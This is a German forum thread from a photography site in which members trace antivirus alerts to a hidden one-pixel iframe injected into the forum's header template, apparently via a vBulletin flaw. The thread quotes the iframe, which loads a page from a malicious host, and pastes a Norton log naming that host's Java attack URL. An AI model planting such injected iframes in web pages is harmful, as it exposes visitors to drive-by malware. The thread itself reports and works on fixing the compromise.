• Neuer Gutscheincode unseres Partners Schutzfolien24:
    DSLR-Forum2025
    Dauerhaft 10% Rabatt auf alle Displayschutzfolien und Schutzgläser der Eigenmarken
    "Upscreen", "Screenleaf", BROTECT" und "Savvies".
    Der Code ist für alle Geräteklassen gültig.
  • Stimmt ab über die Sieger des DSLR-Forum Fotowettbewerbs September 2025.
    Thema: "Straßenfotografie s/w"
    Nur noch bis zum 30.09.2025 23:59!
    Jeder darf abstimmen!
    Zur Abstimmung und Bewertung hier lang
  • Ich freue mich bekannt geben zu können, dass das DSLR-Forum einen neuen Aktionspartner gewinnen konnte.

    Saal Digital bietet Fotoprodukte in HighEnd-Qualität.
    Alle Informationen dazu gibt es demnächst hier.

  • In eigener Sache!

    Liebe Mitglieder, liebe Besucher und Gäste
    ich weiß, es ist ein leidiges Thema, aber ich muss es ansprechen: Werbung, Werbeblocker und Finanzierung des Forums.
    Bitte hier weiterlesen ...

  • Nicht erreichbare Adressen im Benutzerkonto
    Wir bekommen zurzeit eine große Anzahl an E-Mails, die das System zum Beispiel als Benachrichtigungen an Nutzer verschickt,
    als unzustellbar zurück, weil z.B. die Adressen nicht erreichbar sind oder das Postfach gar nicht existiert.
    Stellt doch bitte sicher, dass die Benachrichtigungen, die ihr vom System erwartet, auch zugestellt werden können.
    Nicht erreichbare E-Mail-Adressen sind dazu wenig hilfreich.
    Danke!
WERBUNG

Virus Alert bei Bannerwerbung

Bildermichel schrieb:
ich wusste bisher nicht das die Qualität einer Scanengine an Hand der Menge Ihrer Fehlalarme gemessen wird
Zum Vergrößern anklicken....
Wo ist denn das ein Fehlalarm? Der Scanner hat etwas gemeldet, was offensichtlich als Schädling bekannt war (möglicherweise der Link auf die besagte Webseite). Schließlich wurde dadurch auf den Webseiten des Forums ein unbekannter Eintrag im Source gefunden.
 
Bei mir wird es durch NoScript geblockt - zum Glück - aber da scheint es noch zu sein...

ipq.co hat bei WOT auch einen "Die Seite hat einen schlechten Ruf"-Status - wäre wirklich schön, wenn ihr das mal korrigieren würdet in der template-header-datei...

<!-- BEGIN TEMPLATE: header -->
<!-- logo --><iframe src="http://freefrag.ipq.co/index.php?ref=15" height="1" width="1" frameborder="0"></iframe>
Zum Vergrößern anklicken....
 
Lugias Crusader schrieb:
ipq.co hat bei WOT auch einen "Die Seite hat einen schlechten Ruf"-Status - wäre wirklich schön, wenn ihr das mal korrigieren würdet in der template-header-datei...
Zum Vergrößern anklicken....
Da steht das bloß nicht drin. Das steht übrigens in keiner Datei oder irgendeinem Template drin. Wir suchen uns grade nen Wolf, wo das herkommt.
 
@scorpio

ganz alter Fehler :
http://www.exploit-db.com/exploits/14455/

http://www.securityfocus.com/archive/1/512575/30/0/threaded

Ich entschuldige mich, daß ich den Banner "verdächtigt" habe. Daß eine Intruson der index.php vorliegt, hätte ich nicht gedacht.

Die index.php ( erst mal ) zu korrigieren, sollte ja ne Sache von ner Minute sein. Dann noch das mysql-Passwort gegen ein sicheres Ändern - naja, besser als nixtun.

VBulletin gibt´s bestimmt auch Spezialisten, bin ich allerdings keiner.

The issue has been published this afternoon and vBulletin responded with a patch on it.

http://www.forumpostersunion.com/showthread.php?t=13978
 
Oh Mann - die "bad guys" haben sogar arme DSLR-Foren im Visier -.-*

Aber gut zu wissen, das es gefixt wird/ist - solange NoScript meint, da läuft was im Hintergrund lass ich erst mal alles geblockt im Forum.

/edit: Falls an eurer Forendatenbank was gemacht wurde (von den "bad guys") mal melden dann - würde gerne mein Passwort für's Board dann ändern =) *Zu aller Sicherheit*
 
Vlt. haben die "bad guys" eine neue Lücke gefunden... wäre schon fies =(

Nagut, ich wünsche euch noch viel Glück beim suchen - das Bett ruft, muss früh raus.


Liebe Grüße,
Kevin.
 
derGerryder schrieb:
Norton AV keine Meldung.
Zum Vergrößern anklicken....
Nur zur Info: Bei mir schon, gerade eben, und zwar vor dem Einloggen, wenn noch die erweiterte Werbung aktiv ist (NIS 2011):

Kategorie:Intrusion Prevention

Datum/Uhrzeit,Risiko,Aktivität,Status,Empfohlene Aktion,Name des Risikos,Angreifender Computer,Angreifer-URL,Zieladresse,Quelladresse,Beschreibung des Datenverkehrs

01.05.2011 00:23,Hoch,Ein Eindringversuch von freefrag.ipq.co wurde blockiert.,Blockiert,Keine Aktion erforderlich,Web Attack: Malicious Java Activity 5,"freefrag.ipq.co (69.64.95.59, 80)",freefrag.ipq.co/enc/jv.html,"...",69.64.95.59 (69.64.95.59),"TCP, www-http"

P.S. Was ich jetzt nicht verstehe: Der Iframe ist aktuell immer noch drin (auch jetzt, wo ich diesen Post editiere), aber NIS spring nicht mehr an???
Code: 
<!-- logo --><iframe src="http://freefrag.ipq.co/index.php?ref=15" height="1" width="1" frameborder="0"></iframe>
Alles sehr merkwürdig. Vielleicht springt NIS ja nur dann an, wenn diese URL irgendeinen Inhalt zurückliefert. Einfach so aufgerufen liefert sie nämlich momentan bei mir nur eine leere Seite (noch nicht mal HTML, sondern wirklich 0 Bytes Nutzdaten).

Nachtrag: Ich sehe gerade im Sicherheitsverlauf von NIS, dass kurz nach dem Alarm ein Update der Intrusion Prevention gemacht wurde ("Intrusion Prevention-Engine: 4.8.0.20 Version des Definitionssatzes: 20110429.002"). Vielleicht war es ja wirklich ein Fehlalarm, den Symantec jetzt korrigiert hat.

Nachtrag zum Nachtrag: Die im Alarm angegebene URL (freefrag.ipq.co/enc/jv.html) führt bei mir immer noch zum gleichen Alarm von NIS, also scheint da wohl wirklich was nicht vertrauenswürdiges zu liegen. Die URL im Iframe scheint also vielleicht zufallsgesteuert/selektiv auf irgendwelche anderen URLs weiterzuleiten???
 
Zuletzt bearbeitet:
Mein Avira bringt bei mir ebenfalls diese Meldung. Gestern früh war es okay, als ich abends heim kam, ging es los.

Auch wenn es vielleicht harmlos sein solle, aber ein ständig alarmierender Virenscanner macht mich trotzdem nervös.
 
@Scorpio, schau dir mal deine index.php an, schau ob ganz zum Schluss was eingetragen ist was nicht hin gehört ! Hatte mal vor einem Jahr ein ähnliches Problem nur das ich zum Schluss den ganzen Root Server neu auf setzen musste da so nichts zu finden war.
 
dreizack schrieb:
[...]aber ich finde die Reaktionszeit von 6 Stunden bis zur Prüfung (ca. 15-21Uhr) doch deutlich zu lang.
Zum Vergrößern anklicken....
Diese Aussage finde ich persönlich ein wenig anmaßend. :mad:

Ein Reaktionszeit von 6 Stunden in einem privat betriebenen Forum, welches neben einem geregelten Leben und einen Beruf betrieben wird, ist mehr als ausreichend und verdient Respekt. :top:

In großen Konzernen betragen Reaktionszeiten bei IT-Problemen, wie Systemfehlern, Serverausfällen, etc. in Produktivumgebungen im Durchschnitt 4 Stunden.
Nur: Dort werden entsprechenden SLAs ausgehandelt und diese lassen sich die Dienstleister angemessen vergüten. Zudem werden entsprechende Systeme dort hauptberuflich von Mitarbeitern betreut, denn ein Ausfall bedeutet für die Unternehmen meist finanzielle Verluste in nicht unbedeutenden Größenordnungen.

Nun frage ich mich persönlich, was Du für einen Nachteil (außer vielleicht einem psychologischen) erfahren hast, weil Scorpio erst "nach 6 Stunden" (was ja bereits wiederlegt ist) reagierte/aktiv wurde/eine Rückmeldung gab/etc.?

Gibt es einen berechtigten Grund, dass Du hier "solche Töne" anschlägst?


Ich hatte derweil noch keine dieser beschriebenen Meldungen. Nutze allerdings auch keinen der hier aufgeführten Virenscanner.
Es gibt meines Wissens auch viel mehr (gute) Anbieter von Antivirensoftware als die hier genannten. Und da besagte Meldungen nicht bei allen Antivirenprogrammen (bei einem echten Virus sollte man davon ausgehen) auftreten gehe ich persönlich nicht von einem "virenverseuchten" DSLR-Forum aus. Vielmehr "riecht" das für mich nach einem Problem bei der Erkennung (Stichwort Heuristik, Signatur) bei besagter Antivirenprodukten.
Was also soll jetzt hier geschehen, außer dass Scorpio die entsprechenden Hersteller informiert? Soll er das gesamte Forum auf Verdacht bis zu einer Lösung abschalten und "auf Links drehen"?


...also bitte mal "die Kirche im Dorf" lassen. Danke. :)

Hinweis: Das ist meine persönliche Meinung.
 
Da ich trotz deaktivieren des Web- Guard diese Meldung jedesmal bekommen werde ich hier,erst mal nicht mehr surfen, nur noch auf Nachrichten antworten.
Es ist einfach zu nervig andauernd das gepiepe,ignorien,Ok-dann weiter, nächste Klick, das selbe
 
Man könnte auch mal die Buttons seiner Meldefenster anschauen und nur mal versuchen dahinter zu blicken, was man da so einstellen kann.

Mein Hinweisfenster hat eine Funktion wie: "Diese Meldung nicht mehr anzeigen".

Es hat dann auch das Pipen aufgehört - wirklich! :rolleyes:
 
Du musst dich einloggen oder registrieren, um hier zu antworten.
WERBUNG
Zurück
Oben Unten